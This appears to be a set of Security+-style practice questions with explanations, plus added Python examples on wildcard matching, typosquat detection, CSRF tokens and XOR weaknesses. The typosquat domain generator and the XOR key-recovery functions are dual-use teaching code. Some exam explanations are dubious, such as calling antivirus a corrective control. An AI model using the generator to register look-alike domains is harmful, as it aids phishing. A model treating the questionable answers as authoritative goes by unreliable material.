To reduce the burden of certificate management. A wildcard certificate (usually associated with SSL/TLS certificates) secures a domain and an unlimited number of its subdomains at one level. For example, a certificate for *.davidlprowse.com could secure www.davidlprowse.com as well as the fictitious subdomains sy0-501.davidlprowse.com, blog.davidlprowse.com, and so on (the bare davidlprowse.com, and anything two levels down, needs its own name in the certificate). Instead of having multiple SSL certificates, you could use a single wildcard certificate. This makes the management of certificates easier and can save time and money; the trade-off is that one private key is then shared by every host that presents the certificate, so compromising any of them exposes all of them. Extending the renewal date of a certificate is incorrect because, generally, renewing a certificate simply means that a new certificate is purchased: a CSR is generated (with a new RSA private key) and submitted for approval. The same goes for increasing a certificate's key length; normally this is not done in place, and a new certificate is purchased. Due to an industry mandate with a deadline of December 31, 2013, companies renewed any certificates based on RSA keys shorter than 2048 bits, and the older 1024-bit certificates were added to the issuer's certificate revocation list (CRL). Securing the certificate's private key is incorrect because the wildcard functionality has nothing to do with this. The certificate's public key corresponds to the RSA private key, which should not be known to anyone except the party that generated it, and that key should be at least 2048 bits.
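An added example of exactly which names a wildcard covers (not code from the original page, and not a substitute for your TLS library's own hostname check): the matching rules TLS clients apply per RFC 6125 section 6.4.3, including the two cases that surprise people, the bare domain and a second level of subdomain. The hostnames are the fictitious ones used above.

```python
def matches_name(pattern, hostname):
    """Match a certificate name (CN/SAN dNSName) against a requested host the way TLS clients do:
    case-insensitive; '*' allowed only as the entire leftmost label; it matches exactly one label,
    so it never covers the bare domain or a deeper subdomain; and, as browsers require, at least
    two labels must follow the wildcard ('*.com' is refused)."""
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels, h_labels = pattern.split("."), hostname.split(".")
    if p_labels[0] != "*" or any("*" in lab for lab in p_labels[1:]) or len(p_labels) < 3:
        return False                      # partial wildcards such as 'w*.example' are not honoured
    return len(h_labels) == len(p_labels) and h_labels[1:] == p_labels[1:]


def hosts_covered(cert_names, hostnames):
    """Which of the requested hostnames a certificate carrying these names would be accepted for."""
    return [h for h in hostnames if any(matches_name(n, h) for n in cert_names)]
```

When ordering a wildcard, include the bare domain as a second SAN entry, or clients connecting to davidlprowse.com itself will get a name-mismatch error.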

You want to secure data passing between two points on an IP network. What is the best method to protect from all but the most sophisticated APTs?

Transport encryption. When securing data that passes between two points on an IP network, you need a transport-layer encryption protocol. Examples include Transport Layer Security (TLS) and its deprecated predecessor, Secure Sockets Layer (SSL). These protocols run on top of TCP (they are usually placed at layer 4, or between layers 4 and 7, of the OSI model); they encrypt the transmissions between IP-based hosts, protecting the session data from eavesdroppers, and are thus known as transport layer encryption protocols. They make use of X.509 certificates and a public key infrastructure (PKI). The record layer can use a block cipher (for instance, Advanced Encryption Standard [AES]) or a stream cipher (for example, RC4, which is now prohibited in TLS), but in practice AES in an authenticated mode such as GCM is the norm. By the way, APT stands for advanced persistent threat, a group of continuous hacking processes often performed by multiple attackers. APTs are carried out by knowledgeable, well-resourced groups using very sophisticated attacks; often they operate from another country. Key escrow is when decryption keys are held in escrow (placed in the custody of a third party) in case they are needed to gain access to data. It is common in PKI systems. This is a concept of where keys are stored, not a method of encrypting data transmissions between two hosts. The answers "block ciphers" and "stream ciphers" are not specific enough. You can use either as part of an overall solution to secure data passing between two points on an IP network, but more often than not you will encounter certificates with RSA (or ECDSA) keys used to authenticate the server, an ephemeral Diffie-Hellman exchange (ECDHE) to agree the session key, and AES as the cipher that protects the session data. Whatever the cipher, confirm that certificate validation is enabled on the client: transport encryption without checking the peer's certificate protects only against passive eavesdroppers, not against an active attacker in the middle.

A thumb drive has been used to compromise systems and enable unauthorized access. What kind of malware was most likely installed to the thumb drive?

Trojan. Trojans are used to access a system without authorization. They can be installed on USB flash drives, can be remote access programs, or could be unwittingly picked up when accessing disreputable websites. The key phrase here is "unauthorized access"; that is what the Trojan is trying to achieve. A bot is a computer that performs actions without the user's consent and is often controlled by a remote master computer. Although the bot itself doesn't enable unauthorized access, a Trojan might carry a bot program as part of its payload. A logic bomb is malicious code that lies dormant until a trigger condition is met (a date, a user action, or the removal of an account) and then initiates its malicious function; it is not a means of gaining access. Viruses infect a computer but are not used for unauthorized access.

Which type of attack relies on mistakes made by users when they input Web addresses?

URL hijacking. A URL hijacking, or typo squatting, attack relies on mistakes made by users when they input Web addresses: the attacker registers look-alike domains (a dropped or transposed letter, a neighbouring key, a visually similar character, a wrong TLD) and serves phishing pages or malware to whoever lands there. Answer A is incorrect. A malicious insider threat occurs when legitimate users take advantage of the valid access they have to resources to carry out an attack against an organization. Disgruntled employees are most often the malicious insiders who initiate these attacks. Answer B is incorrect. A watering hole attack occurs when an attacker profiles victims to discover the sites they visit. The attacker then examines the most commonly visited sites for vulnerabilities. Once a vulnerability is discovered, the attacker compromises the site and redirects users to an alternative site that infects the computers of users who access it. This attack may also be called a waterhole attack. Answer C is incorrect. A denial of service (DoS) attack occurs when attackers overrun a server with requests so that legitimate users cannot access the server.
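An added example (not code from the original page, and a small subset of what tools such as dnstwist enumerate) that generates the look-alike domains a typo squatter would register for a brand, so a defender can register or monitor them. The keyboard-adjacency and homoglyph tables are constructed for the demo and cover lowercase ASCII only; real brand monitoring also needs IDN homographs.

```python
# QWERTY adjacency (constructed, lowercase letters only).
QWERTY = {
    "q": "wa", "w": "qeas", "e": "wrsd", "r": "etdf", "t": "ryfg", "y": "tugh", "u": "yihj",
    "i": "uojk", "o": "ipkl", "p": "ol", "a": "qwsz", "s": "weadzx", "d": "erfsxc",
    "f": "rtgdcv", "g": "tyhfvb", "h": "yujgbn", "j": "uikhnm", "k": "ioljm", "l": "opk",
    "z": "asx", "x": "zsdc", "c": "xdfv", "v": "cfgb", "b": "vghn", "n": "bhjm", "m": "njk",
}
# Characters that read alike in many fonts (constructed subset).
HOMOGLYPHS = {"l": "1", "o": "0", "i": "l", "m": "rn", "w": "vv", "d": "cl"}


def typosquat_candidates(domain):
    """Look-alike domains for `domain` (name.tld), keyed by candidate and tagged with how it was
    derived: omission, repetition, adjacent-key, transposition, homoglyph or wrong-tld."""
    name, tld = domain.lower().rsplit(".", 1)
    cands = {}

    def add(kind, candidate):
        full = candidate + "." + tld
        if candidate and candidate != name and full not in cands:
            cands[full] = kind

    for i, ch in enumerate(name):
        add("omission", name[:i] + name[i + 1:])                  # exmple
        add("repetition", name[:i] + ch + name[i:])                # exaample
        for key in QWERTY.get(ch, ""):
            add("adjacent-key", name[:i] + key + name[i + 1:])     # exanple
    for i in range(len(name) - 1):
        add("transposition", name[:i] + name[i + 1] + name[i] + name[i + 2:])   # exmaple
    for src, dst in HOMOGLYPHS.items():
        if src in name:
            add("homoglyph", name.replace(src, dst, 1))             # examp1e
    for alt in ("co", "cm", "om", "con", "net", "org"):
        if alt != tld:
            cands[name + "." + alt] = "wrong-tld"                   # example.co
    return cands


def is_lookalike(observed, legitimate):
    """Monitoring check: does an observed domain (from logs, new registrations, certificate
    transparency) fall in the look-alike set of a brand domain? Returns the category or None."""
    return typosquat_candidates(legitimate).get(observed.lower())
```

Feeding newly registered domains or certificate-transparency logs through is_lookalike is the usual way to catch a squat before the phishing campaign starts.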

What is the best countermeasure for a buffer overflow attack on a commercial application?

Update the software with the latest patches, updates, and service packs. The best countermeasure for a buffer overflow attack on a commercial application is to update the software with the latest patches, updates, and service packs, because you cannot fix the vendor's code yourself. A buffer overflow occurs when a buffer receives more data than it is programmed to accept, so the excess overwrites adjacent memory. Buffer overflow attacks exploit poor programming practices and inadequate code review, and they are common against Web servers and other network-facing services. Input validation is another countermeasure: rejecting input that is longer than the buffer or that contains unexpected characters before it reaches the vulnerable code. Platform mitigations such as non-executable stacks (DEP/NX), stack canaries, and ASLR make exploitation harder but do not remove the bug. The best countermeasure for a buffer overflow in a company-developed, proprietary application is to edit the application code to include bounds checking, ensuring that data is of an acceptable length before it is copied. Answer B is incorrect. The best countermeasure for replay attacks is to implement timestamps and sequence numbers. Answer A is incorrect. The best countermeasure for maintenance hooks is to implement code reviews and quality assurance on a regular basis. Answer D is incorrect. A buffer overflow attack can sometimes be detected with a packet sniffer by examining packets on your network: a long run of repeated bytes (such as a NOP sled of 0x90 or a string of the same character) followed by machine code in the middle of a request is indicative of a buffer overflow attempt, though this is a detection aid, not a countermeasure.

Your client operates a 24-hour call center. Several different employees may log in to the same workstation in the course of a week. Machine (computer) certificates are currently used, but they do not provide sufficient security safeguards because more than one employee logs in to each machine. You need to ensure that each employee has his or her own credential. What should you implement?

User certificate. User certificates are assigned to individual users, much as machine/computer certificates are assigned to individual machines. Users must present their assigned certificate for authentication before accessing certain resources. This certificate may be presented to web sites, hosts, and any authentication mechanism; a smart card is the usual way to keep the private key with the person rather than on the shared workstation. By contrast, machine/computer certificates are assigned to a designated machine. During authentication, the computer (or machine) requesting access must supply the certificate assigned to it. In this scenario the users all share machines, so a machine certificate does not identify the person and provides no additional safeguard. Answer B is incorrect. Domain validation certificates are very common. They are low-cost and are often used by web admins to offer TLS on a domain. They are validated using only the domain name. In this scenario all users are in the same domain, so a domain validation certificate would not provide additional safeguards. Answer A is incorrect. Wildcard certificates allow you to create a certificate for a domain and use that same certificate for multiple subdomains. For example, if you had mail.mysite.com, ftp.mysite.com, and www.mysite.com, you could issue a wildcard certificate for mysite.com and have it cover all the subdomains. Without the wildcard certificate, you would have to issue a certificate for each subdomain. Answer D is incorrect. Self-signed certificates are signed with the subject's own private key rather than by a certificate authority; Microsoft Internet Information Services (IIS) can generate one. A self-signed certificate still carries a public key, but browsers will warn or refuse because it does not chain to a trusted root.
Self-signed certificates are not as secure because they are not issued by a trusted third party. You should also be familiar with email certificates, SAN fields, code signing certificates, extended validation certificates, and root certificates. Extended validation certificates, as the name suggests, provide additional validation for HTTPS web sites. The certificate provides the name of the legal entity responsible for the web site. These certificates require the most effort by the CA to validate and provide a higher level of trust than domain validation because they are validated using more than the domain information. Email certificates are used to secure email. One such example is Secure Multipurpose Internet Mail Extensions (S/MIME), which provides a digital signature for that email. Root certificates define the root CA and validate all other certificates issued by that CA. They are at the top of the CA hierarchy, are self-signed, and are closely guarded. Subject Alternative Name (SAN) is a field in the certificate that allows you to stipulate additional names, such as an IP address or host name, associated with the certificate. Code signing certificates are used for code that is distributed over the Internet, including programs or applications. Code signing certificates verify the code's origin and help the user trust that the claimed sender is indeed the originator.

Ann has been asked by her boss to periodically ensure that a domain controller/DNS server maintains the proper security configuration. Which of the following should she review?

User rights. The best answer is user rights. A domain controller is in charge of user accounts, the user rights assigned to them (which actions an account may perform, such as logging on locally, logging on as a service, or backing up files), and the permissions that flow from group membership; a periodic review of those rights is how you catch privilege creep and stale administrative accounts. The domain controller might have a host-based firewall, but that is unlikely to be the control of interest here. Chances are that the firewall is network-based or, less commonly, running on a separate server. The NIPS is the network intrusion prevention system, which is external to the server and usually resides on the perimeter of the network. The WINS configuration can be reviewed to verify the security of the WINS database and service, but it does not cover the security configuration of the server as described, which is a domain controller/DNS server. Also, if the server is running the DNS service, it likely isn't also running the WINS service.

You are designing a network. In addition to placing devices in a peripheral network, you need to place security devices in several key departments. Which of the following security devices could NOT be placed wherever they are needed in the network?

VPN concentrators. VPN concentrators cannot be placed wherever they are needed in the network; they should be placed in the perimeter network near the gateway, where the tunnels terminate. The other answers (load balancers, correlation engines, and aggregation switches) are incorrect because those devices can be placed where they are needed in the network. No particular type of location is better than another for their purposes. Correlation engines examine logs from several firewalls and other sources and aggregate the entries to determine attack patterns. As long as the firewall is reachable from the correlation engine, the engine need not be placed in close proximity to the firewall. Aggregation switches combine multiple links into a single bandwidth stream and can be placed anywhere they are needed. Proxies are best suited for placement in the perimeter network.
Other security devices and technologies that are sensitive to their placement include DDoS mitigators, sensors, collectors, load balancers, SSL accelerators, taps, and SDN. Sensors, collectors, and correlation engines should be placed close to the devices being monitored to improve performance. Load balancers are usually placed in the same network as the devices that receive a high load. VPN concentrators should be placed on the VPN perimeter. SSL accelerators should be placed close to or on the devices using SSL/TLS. Taps should be placed closest to the devices they are monitoring. SDN can be used anywhere, but the SDN controller should be centrally located to provide the best performance for all devices that communicate via the SDN. A DDoS mitigator should be placed in the perimeter network, upstream of what it protects, so that it can detect and mitigate a DDoS attack before the flood reaches internal links. Sensors are a classification of security devices that collect information on a host or on the network. Based on the information received, they may produce an alert or react with a trigger. Collectors are a classification of security devices that gather information from various sources and deliver it to a correlation engine. SSL accelerators offload the processor-intensive work of SSL/TLS encryption. Load balancers are placed based on where they are needed: if one needs to balance the load among several web servers, it would be placed in the DMZ; if there is high traffic to internal file servers, it would be better placed in the same network segment as the file servers. Taps (monitoring ports) and port mirrors allow an IDS to examine network traffic, and they should be placed in the appropriate network segment; a passive tap sees traffic that a mirror port may drop under load. Software-defined networking (SDN) separates the control plane from the data plane and lets the entire network, including its security devices, be defined and virtualized in software.

What are the best ways for a web programmer to prevent website application code from being vulnerable to XSRF attacks? (Select the two best answers.)

Validate input on the client and the server side. Restrict the use of special characters in form fields. Input validation is extremely important when it comes to website attacks such as XSRF (cross-site request forgery) and cross-site scripting (XSS). Forms and other documents should be validated on the server side, where the checks cannot be bypassed, and on the client side as well for a quick response to the user (client-side checks alone are trivially skipped with an intercepting proxy). Special characters should be restricted and sanitized within form fields and URLs. This is all part of secure coding. Note that in practice input validation mainly defeats XSS; the specific defence against XSRF is an anti-forgery token tied to the user's session (with SameSite cookie attributes and Origin/Referer checks as further layers), because a forged request carries perfectly valid-looking input. Using angle brackets for HTML code (for example < and >) is just good programming. Without angle brackets, the HTML statement won't work, but it has nothing to do with input validation. The more redirection that occurs, the greater the chance of vulnerabilities being exploited; URL redirection should be limited if not eliminated. Web proxies make for more efficient web connections in a variety of ways but do nothing for input validation.

A programmer wants to prevent cross-site scripting. Which of the following should the programmer implement?

Validation of input to remove hypertext. Cross-site scripting (XSS) is a vulnerability in web applications in which a malicious attacker injects hypertext (HTML or script) into a standard text-based web form and the application then echoes it into pages viewed by other users, whose browsers execute it. The programmer should validate input against an allow-list and, just as importantly, encode output for the context in which it is rendered (HTML entity encoding for page content, for example), so that anything that slips past validation is displayed as text rather than executed. Shell scripts, batch files, and Java bytecode are not associated with XSS attacks.
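An added example serving both this answer and the XSRF answer above (not code from the original page, and not tied to any framework): a server-side handler that applies an Origin check and an anti-forgery token for XSRF, allow-list validation for the username field, and HTML output encoding for the comment. The server secret, the site origin and the form contents are constructed for the demo.

```python
import hashlib
import hmac
import html
import re
import secrets

SERVER_SECRET = b"constructed-server-side-secret"   # hypothetical; would come from config or a KMS
ALLOWED_ORIGIN = "https://app.example"               # hypothetical site origin


def validate_username(value):
    """Allow-list validation on the server: only the characters the field legitimately needs."""
    return re.fullmatch(r"[A-Za-z0-9_.-]{1,32}", value) is not None


def render_comment(text):
    """Output encoding for the HTML-body context: whatever passed validation is shown as text."""
    return "<p>" + html.escape(text, quote=True) + "</p>"


def issue_csrf_token(session_id):
    """Anti-forgery token bound to the session: random nonce plus an HMAC over (session, nonce).
    Stateless variant, so the server keeps no token table; it goes in a hidden form field."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id, token):
    """A token minted for another session (or made up by the attacker) fails the HMAC check."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def handle_post(session_id, form, origin_header=None):
    """A state-changing handler with the checks in the order a framework applies them:
    origin, anti-forgery token, input validation, then output encoding of what is echoed back."""
    if origin_header is not None and origin_header != ALLOWED_ORIGIN:
        return 403, "cross-origin request rejected"
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return 403, "missing or invalid CSRF token"
    if not validate_username(form.get("username", "")):
        return 400, "invalid username"
    return 200, render_comment(form.get("comment", ""))
```

The comment field is free text, so it is not validated away but encoded on output; that is why a pasted script tag comes back as harmless text instead of being rejected or executed.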

The IT director asks you to verify that the organization's virtualization technology is implemented securely. What should you do?

Verify that virtual machines have the latest updates and patches installed. One of the most important security precautions you can take is to install updates and patches. This applies to regular operating systems, applications, and virtual machines alike, and to the hypervisor underneath them. It is unnecessary for virtual machines to be multihomed, because that does not increase their security; in fact, the more network connections a VM has, the larger its attack surface. Penetration testing should be completed before the virtual machines go into production, and repeated after significant changes. Subnetting is not necessary for virtual machines, although it can increase security by segmenting them; it should be taken into account during the planning and implementation stage.

You are configuring an 802.11n wireless network. You need to have the best combination of encryption and authorization. Which of the following options should you select?

WPA-Enterprise. Among the options listed, WPA-Enterprise offers a decent level of encryption (WPA) as well as a strong means of authentication and authorization (Enterprise). Enterprise usually means you are using a separate RADIUS server, or something similar, to handle the authentication side of things, rather than relying on a shared key stored on the wireless device itself. Although WPA2-PSK offers a better level of encryption, it does not offer per-user authorization the way an enterprise configuration does. The combination of WEP and 802.1X does offer a form of authorization, but WEP is deprecated and is not recommended in any scenario. Combining WPA and TKIP offers the same level of encryption as WPA-Enterprise but does not offer authorization. Outside the exam, WPA2-Enterprise (AES-CCMP) or WPA3-Enterprise is what you would actually deploy on 802.11n hardware, since WPA/TKIP itself has known weaknesses.

Your boss has asked you to reduce an AP's power setting and place the AP in the center of your building. What reconnaissance method is your boss trying to prevent?

War-driving. Your boss is trying to prevent war-driving. By reducing the AP's transmit power and placing it centrally, you limit how far the signal leaks outside the building and so reduce the chance of a war-driver being able to access (or even "see") your wireless network. An evil twin is an AP put in place maliciously that has the same SSID as an existing AP on your network. Rogue APs are access points that are not part of your authorized wireless network. The techniques in the scenario might also reduce RF interference; however, RF interference is not a reconnaissance method.

Which of the following uses a binary key and is often combined with or incorporated into a symmetric algorithm because it is not secure when used by itself?

XOR. Exclusive OR (XOR) uses a binary key to create ciphertext, and because XOR is its own inverse, the same operation decrypts. By itself, XOR does not provide a high level of security: with a short key the key repeats across the message, and wherever an attacker knows or can guess some plaintext, XORing it with the ciphertext hands back the key. XOR is secure only with a truly random key as long as the message that is never reused (a one-time pad); reusing the key leaks the XOR of the two plaintexts. Consequently, XOR is used as a building block inside symmetric ciphers (in stream ciphers, in block cipher modes such as CBC and CTR) rather than as a cipher on its own. Answer C is incorrect. RACE Integrity Primitives Evaluation Message Digest (RIPEMD) was based on MD4 and was replaced by RIPEMD-160 (160 bits). Newer versions are RIPEMD-256 and RIPEMD-320. Answer D is incorrect. ROTate 13 (ROT13) is a simple substitution cipher that replaces each letter with the letter 13 places further along the alphabet. For example, A becomes N, B becomes O, C becomes P, and so on. Answer A is incorrect. Substitution ciphers replace each character with another (transposition ciphers, by contrast, rearrange the characters); both are older methods that are now easily broken by a computer.
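An added example of why bare XOR is not secure (not code from the original page): a repeating-key XOR "cipher", the known-plaintext recovery of its key from a crib, and the two-time-pad leak when even a full-length random key is reused. The key, message and crib are constructed for the demo.

```python
import os


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def repeating_key_xor(data, key):
    """XOR 'cipher' with a short key cycled over the data. Encryption and decryption are the same op."""
    return bytes(d ^ key[i % len(key)] for i, d in enumerate(data))


def one_time_pad(data):
    """XOR with a random key as long as the message, used once: the only secure use of bare XOR."""
    key = os.urandom(len(data))
    return key, xor_bytes(data, key)


def recover_key_from_crib(ciphertext, crib, offset, key_len):
    """Known-plaintext attack. If the attacker knows `crib` sits at `offset` in the plaintext
    (a protocol header, a greeting), ciphertext XOR crib yields the key bytes at those positions;
    with a repeating key of length key_len and a crib at least that long, the whole key follows."""
    fragment = xor_bytes(ciphertext[offset:offset + len(crib)], crib)
    if len(fragment) < key_len:
        raise ValueError("crib shorter than the key: only a partial key is recoverable")
    key = bytearray(key_len)
    for i, b in enumerate(fragment[:key_len]):
        key[(offset + i) % key_len] = b
    return bytes(key)


def two_time_pad_leak(ct1, ct2, known_p1):
    """Key reuse, even of a one-time pad: c1 XOR c2 = p1 XOR p2, so knowing p1 reveals p2."""
    return xor_bytes(xor_bytes(ct1, ct2), known_p1)
```

Stream ciphers built on XOR (including AES in CTR mode) inherit exactly this property, which is why a nonce must never be reused under the same key.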

A security administrator for your organization utilized a heuristic system to detect an anomaly in a desktop computer's baseline. The admin was able to detect an attack even though the signature-based IDS and antivirus software did not detect it. Upon further review, it appears that the attacker had downloaded an executable file on the desktop computer from a USB port, and executed it triggering a privilege escalation. What type of attack has occurred?

Zero day. A zero day attack (such as a zero day virus) is one that, up until the time the attack occurs, was unknown to antivirus and IDS vendors. So, for the attack in question, there was no AV or IDS signature available to detect it; it is an unknown and undocumented exploit. The admin found it by utilizing a heuristic (anomaly-based) system, which compares behaviour against a baseline rather than against known signatures. In a similar scenario, if a malicious exploit is found in an application and you inquire with the software vendor about remediation steps, only to find that no patches are available, you have most likely found a zero day. In these situations you will have to improvise with compensating controls until a patch exists. The rest of the answers are known attacks. Directory traversal is a method of accessing unauthorized parent directories on web servers. XML injection is a type of code injection used against website forms. Baiting is a type of social engineering attack in which a USB flash drive or other removable medium (often containing malware) is left out in the open for an unsuspecting person to pick up and, the attacker hopes, plug into a computer.

To which type of attack are password files stored on a server vulnerable?

a dictionary attack A dictionary attack is based on the attacker's efforts to determine the decryption key to defeat a cipher. This attack uses words from the dictionary and typically succeeds because many users choose passwords from a dictionary that are easy to remember. Therefore, the dictionary attack is a part of cryptanalysis. One-way encryption or one-way hashing protects against reading or modifying the password file, but an intruder can launch a dictionary attack after capturing the password file. Answer B is incorrect. A SYN flood attack is a Denial of Service (DoS) technique. The attacker sends multiple SYN packets to a target machine from a spoofed source IP address. The victim machine responds to the service requests by replying with an acknowledgement (SYN-ACK) and allocating resources to the spoofed source IP address. The target machine runs out of resources, and the requests from legitimate users are denied. Answer A is incorrect. In a side channel attack, the attacker gains information regarding the encryption algorithms running in the cryptosystem that is implemented in the network. The attacker can use information such as power consumption, electromagnetic radiation, and sound to break into a system. The side channel attack can also be based on the time taken to perform a computation. Answer D is incorrect. A DoS attack exploits the limitations of the TCP/IP protocol by flooding the network with a large number of false resource requests or by consuming the complete bandwidth of the network. To fulfill the resource requests that are falsely created by the attacker, the network exhausts its resources. Therefore, legitimate and authorized users are denied services on the basis of a resource crunch in the network.

You are the security administrator for your company. You identify a security risk. You decide to continue with the current security plan. However, you develop a contingency plan for if the security risk occurs. Which type of risk response strategy are you demonstrating?

acceptance You are demonstrating a risk response strategy of acceptance. Acceptance involves accepting the risk and leaving the security plan unchanged. Examples of acceptance would include taking no action at all or leaving the plan unchanged and developing a contingency or fallback plan. Answer B is incorrect. You are not demonstrating a risk response strategy of avoidance. Avoidance involves modifying the security plan to eliminate the risk or its impact. Examples of avoidance would include limiting the scope of security, adding security resources to eliminate the risk, or removing resources from a resource to eliminate the risk. Answer A is incorrect. You are not demonstrating a risk response strategy of mitigation. Mitigation involves reducing the probability or impact of a risk to an acceptable risk threshold. Examples of mitigation would include taking actions to minimize the probability of a risk. Answer D is incorrect. You are not demonstrating a risk response strategy of transference. Transference involves transferring the risk and its consequences to a third party. The third party is then responsible for owning and managing the risk. Purchasing insurance is an example of transference.

As a security administrator, you are responsible for ensuring that your organization's IT staff understands the security mechanisms employed on the network. You are currently documenting the security mechanisms as part of the IT training. During the documentation, you realize that many of the IT staff do not understand the basic terms used in IT security. You need to document the terms and definitions that you will use. What is a mathematical formula that is used in cryptography to encrypt data?

algorithm An algorithm is a mathematical formula that is used in cryptography to encrypt data by transforming plaintext into ciphertext. Plaintext, sometimes referred to as clear text, is information in its pre-encrypted form. Ciphertext is data in its post-encrypted form. A key is information that can be plugged into an encryption algorithm to either encrypt plaintext or decrypt ciphertext. Private keys are kept secret and are used in symmetric and asymmetric algorithms. Public keys are shared and used in asymmetric algorithms. The public key of the recipient is used to encrypt an e-mail message to ensure the message can only be read by its intended recipient. Public keys decrypt the hash of an electronic signature.

Which policy defines the sensitivity of a company's data?

an information policy An information policy defines the sensitivity of a company's data and the proper procedures for storage, transmission, disposal, and marking of a company's data. The cornerstone practice of a company's information policy, as with all security-related policies, is to grant only the level of access that is required to allow particular individuals to fulfill their responsibilities. Accordingly, a well-developed information policy will rely on information about separation of duties to establish different levels of access by group role or individual responsibility. Individuals will be granted access only to that information for which they have a 'need to know' to accomplish the goals of their position. Answers D, C, and B are incorrect. A backup policy defines the procedures that should be used to back up information stored on a company's network. A security policy defines the technical means that are used to protect data on a network. A use policy, sometimes referred to as an acceptable use policy, defines the manner in which employees are allowed to use a company's network equipment and resources, such as bandwidth, Internet access, and e-mail services. Policies contain conditions of expected performance and the consequences of non-compliance. An access control policy details guidelines on the rights, privileges, and restrictions for using company equipment and assets.

Your company recently implemented an internal public key infrastructure (PKI). You need to ensure that all of the PKI components are secure and are currently researching the vulnerabilities on the entity that signs the certificates. Which entity are you examining?

an issuer In a public key infrastructure (PKI), an issuer is the entity that signs a certificate. Signing a certificate verifies that the name and key in the certificate are valid. PKI is a system designed to securely distribute public keys. A PKI typically consists of the following components: certificates, a key repository, a method for revoking certificates, and a method to evaluate a certificate chain, which security professionals can use to follow the possession of keys. Chain of custody might be used in proving legal cases against hackers. Answers C, D, and A are incorrect. A principal is any entity that possesses a public key. A verifier is an entity that verifies a public key chain. A subject is an entity that seeks to have a certificate validated. When using a PKI, keep the following points in mind: When encrypting a message with the public key, only the private key can decrypt it. When encrypting a message with the private key, only the public key can decrypt it.

Your company has decided to install multiple types of monitoring devices on your network. Which type of monitoring is most likely to produce a false alert?

anomaly-based Anomaly-based monitoring is most likely to produce a false alert. With anomaly-based monitoring, alerts occur where there are any deviations from normal behavior. Deviations from normal behavior will normally occur but are not always indications of a possible attack. With this type of monitoring, there is an initial learning period before anomalies can be detected. Once the baselines are established, anomaly-based monitoring can detect anomalies. Sometimes the baseline is established through a manual process. Answers B and D are incorrect. Misuse-detection-based monitoring is the same as signature-based monitoring. Signature-based monitoring is more likely to give you a false sense of security rather than a false alert. Signature-based monitoring relies upon a database that contains the identities of possible attacks. This database is known as the signature database. Signature-based monitoring watches for intrusions that match a known identity or signature. Signature-based monitoring requires that updates be regularly obtained to ensure effectiveness. Answer C is incorrect. Behavior-based monitoring is not likely to produce a false alert because you defined non-acceptable behavior. It is more susceptible to giving you a false sense of security. It is only as strong as the behaviors you have defined. If you do not properly define inappropriate behaviors, then attacks can occur. Behavior-based monitoring looks for behavior that is not allowed and acts accordingly. When you define a rule that prevents an e-mail client from executing the cmd.exe command and alerts you when this is attempted, you are using behavior-based monitoring.

During a meeting, you present management with a list of the access controls used on your network. You explain that these controls include preventative, detective, and corrective controls. Which control is an example of a corrective control?

antivirus software Antivirus software is an example of a corrective technical control because it attempts to correct any damage that was inflicted during a security breach. Antivirus software can also be considered a compensative technical control. Answers A, D, and C are incorrect. Routers are examples of preventative technical controls because they prevent security breaches. Routers are a compensatory technical control. IDSs are a detective technical control and a compensative technical control. Audit logs are examples of detective technical controls because they detect security breaches. Audit logs are also a compensative technical control. There are three categories of access control: technical, administrative, and physical controls. A technical control is a control that is put into place to restrict access. Technical controls work to protect system access, network architecture and access, control zones, auditing, and encryption and protocols. An administrative or management control is a control that dictates how security policies are implemented to fulfill the company's security goals. Administrative controls include policies and procedures, personnel controls, supervisory structure, security training, and testing. A physical or operational control is a control that is implemented to secure physical access to an object, such as a building, a room, or a computer. Physical controls include network segregation, perimeter security, computer controls, work area separation, backups, and cabling. The three access control categories provide seven different functionalities or types:
preventative - A preventative control prevents security breaches.
detective - A detective control detects security breaches as they occur.
corrective - A corrective control restores control and attempts to correct any damage that was inflicted during a security breach.
deterrent - A deterrent control deters potential violations.
recovery - A recovery control restores resources.
compensative - A compensative control provides an alternative control if another control may be too expensive. All controls are generally considered compensative.
directive - A directive control provides mandatory controls based on regulations or environmental requirements.
Each category of control includes controls that provide different functions. For example, a fence is both a deterrent physical control and a compensative physical control. Monitoring and supervising are both a detective administrative control and a compensative administrative control.

Which of these requirements would indicate that you needed to install a router as opposed to an NIPS/NIDS?

anti-spoofing Anti-spoofing is a router function, where an application compares the incoming or outgoing IP address to an ACL. Other types of anti-spoofing perform similar functions on MAC addresses or switch ports. A NIDS or NIPS would not check IP address traffic for spoofing. Answers C, B, and A are incorrect. Inline vs. passive are installation decisions made when you choose between a network-based intrusion prevention system (NIPS) and a network-based intrusion detection system (NIDS). An NIPS is an active device that monitors and reacts to network intrusions. An NIDS is a passive device that only provides notification in the event of a security breach. In-band or out-of-band would also indicate a decision between an NIDS or NIPS. In-band management of an NIDS/NIPS would refer to local management, whereas out-of-band management would be performed remotely. Rules define what an NIDS/NIPS monitors with regard to incoming network traffic.

You are researching the different types of firewalls that you can install to protect your company's network and assets. Which type of firewall is most detrimental to network performance?

application-level proxy firewall An application-level proxy firewall is most detrimental to network performance because it requires more processing per packet. The packet-filtering firewall provides high performance. Stateful and circuit-level proxy firewalls, while slower than packet-filtering firewalls, offer better performance than application-level firewalls. Kernel proxy firewalls offer better performance than application-level firewalls. This type of firewall is a firewall that is built into the operating system kernel. An application-level firewall creates a virtual circuit between the firewall clients. Each protocol has its own dedicated portion of the firewall that is concerned only with how to properly filter that protocol's data. Unlike a circuit-level firewall, an application-level firewall does not examine the IP address and port of the data packet. Often these types of firewalls are implemented as a proxy server. A proxy-based firewall provides greater network isolation than a stateful firewall. A stateful firewall provides greater throughput and performance than a proxy-based firewall. In addition, a stateful firewall provides some dynamic rule configuration with the use of the state table. Stateless firewalls make decisions based on the data that comes in and not on any complex rules. Stateful firewalls maintain a state table that tracks every communication packet.

You need to ensure that your company's anti-virus application protects against viruses that include protective code that prevents outside examination of critical elements. Which type of virus is this?

